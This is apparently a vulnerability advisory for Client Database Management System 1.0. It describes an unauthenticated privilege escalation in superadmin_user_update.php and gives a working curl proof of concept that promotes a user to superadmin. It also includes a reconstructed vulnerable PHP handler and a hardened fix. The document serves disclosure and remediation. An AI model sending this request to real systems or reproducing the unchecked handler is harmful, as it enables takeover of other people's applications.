@Adarshh-A
Created February 26, 2026 10:56
Client Database Management System 1.0 - Unauthenticated Privilege Escalation (superadmin_user_update.php)

Unauthenticated Privilege Escalation

Client Database Management System 1.0

Vulnerable File

superadmin_user_update.php


Description

The file superadmin_user_update.php does not implement any authentication or authorization checks before processing user update requests.

The endpoint directly accepts POST parameters and updates the users table, including the role field, for whatever user_id the request names.

Because no session validation or role verification is performed, an unauthenticated attacker can modify any user's record, including its role. The only prerequisites are a target user_id (a small sequential integer that is trivially enumerated) and the ability to log in as that account afterwards, for example a self-registered or otherwise known low-privilege account.

This allows privilege escalation by promoting a regular user account to superadmin.
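The following is an added illustrative example, not the Client Database Management System's own source. The first function is a reconstruction of the behaviour the advisory describes for superadmin_user_update.php (an UPDATE on the users table driven straight from POST data, with no session or role check); the table and column names follow the advisory and everything else (role names, session layout, CSRF token storage, the $db handle) is assumed. The second function shows the minimum a fixed handler needs: authenticate the session, re-read the caller's role from the database rather than trusting the client, validate the inputs, and bind the request to a CSRF token so a logged-in superadmin cannot be driven through the same endpoint by a third-party page.

```php
<?php
// Added example, not project code. Reconstructs the vulnerable pattern
// described in the advisory and places a hardened handler beside it.
// Assumptions: PDO connection in $db, session keys 'user_id' and
// 'csrf_token', and the role set below; the real application may differ.

// --- Vulnerable pattern (assumed shape of superadmin_user_update.php) ---
// No authentication, no authorization, role taken verbatim from the client.
function update_user_vulnerable(PDO $db, array $post): array
{
    $stmt = $db->prepare(
        'UPDATE users SET firstname = ?, lastname = ?, username = ?, role = ?,
                          department_assignment = ?, id_number = ?
         WHERE user_id = ?'
    );
    $stmt->execute([
        $post['firstname'], $post['lastname'], $post['username'],
        $post['role'], $post['department_assignment'], $post['id_number'],
        $post['user_id'],
    ]);
    return ['status' => 'success', 'message' => 'User updated successfully!'];
}

// --- Hardened handler ---
const ALLOWED_ROLES = ['user', 'manager', 'superadmin']; // assumed role set

function update_user_hardened(PDO $db, array $session, array $post): array
{
    // 1. Authentication: the caller must hold a logged-in session.
    if (empty($session['user_id'])) {
        http_response_code(401);
        return ['status' => 'error', 'message' => 'Authentication required'];
    }

    // 2. CSRF: bind the state-changing POST to a per-session token so a
    //    logged-in superadmin cannot be driven through this endpoint
    //    cross-site. hash_equals() is constant-time and needs two strings.
    $known = (string)($session['csrf_token'] ?? '');
    $given = (string)($post['csrf_token'] ?? '');
    if ($known === '' || !hash_equals($known, $given)) {
        http_response_code(403);
        return ['status' => 'error', 'message' => 'Invalid CSRF token'];
    }

    // 3. Authorization: re-read the caller's role from the database at
    //    request time; never trust a role supplied or cached by the client.
    $q = $db->prepare('SELECT role FROM users WHERE user_id = ?');
    $q->execute([(int)$session['user_id']]);
    if ($q->fetchColumn() !== 'superadmin') {
        http_response_code(403);
        return ['status' => 'error', 'message' => 'Superadmin privileges required'];
    }

    // 4. Input validation: integer target id, role from the allow-list only.
    $targetId = filter_var($post['user_id'] ?? null, FILTER_VALIDATE_INT);
    $role     = (string)($post['role'] ?? '');
    if ($targetId === false || !in_array($role, ALLOWED_ROLES, true)) {
        http_response_code(400);
        return ['status' => 'error', 'message' => 'Invalid user_id or role'];
    }

    // 5. Only now perform the update, still with bound parameters.
    $stmt = $db->prepare(
        'UPDATE users SET firstname = ?, lastname = ?, username = ?, role = ?,
                          department_assignment = ?, id_number = ?
         WHERE user_id = ?'
    );
    $stmt->execute([
        (string)($post['firstname'] ?? ''), (string)($post['lastname'] ?? ''),
        (string)($post['username'] ?? ''), $role,
        (string)($post['department_assignment'] ?? ''),
        (string)($post['id_number'] ?? ''), $targetId,
    ]);
    return ['status' => 'success', 'message' => 'User updated successfully!'];
}

// Entry point as the fixed file would use it ($db is assumed to exist).
session_start();
header('Content-Type: application/json');
echo json_encode(update_user_hardened($db, $_SESSION, $_POST));
```

With the hardened handler in place, the advisory's curl request returns a 401 with {"status":"error","message":"Authentication required"} and the users row is untouched; re-running the verification query afterwards should still show the original role. Re-reading the role from the database (step 3) rather than from the session also means a superadmin demoted in one session loses the privilege immediately instead of at next login.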


Proof of Concept (PoC)

An unauthenticated attacker can send:

curl -X POST http://127.0.0.1/cdm/superadmin_user_update.php \
  -d "user_id=32" -d "firstname=Test" -d "lastname=User" -d "username=testuser" \
  -d "role=superadmin" -d "department_assignment=IT" -d "id_number=ID999"

Server response:

{"status":"success","message":"User updated successfully!"}


Verification

After the request, database query:

SELECT user_id, username, role FROM users WHERE user_id=32;

Result:

32 | testuser | superadmin

This confirms privilege escalation without authentication.


Impact

An attacker can:

  • Escalate privileges to superadmin
  • Modify or delete users
  • Delete managers
  • Manipulate system data
  • Gain full administrative control

This results in complete compromise of the system.


CVSS v3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Base Score: 9.8

Severity: Critical
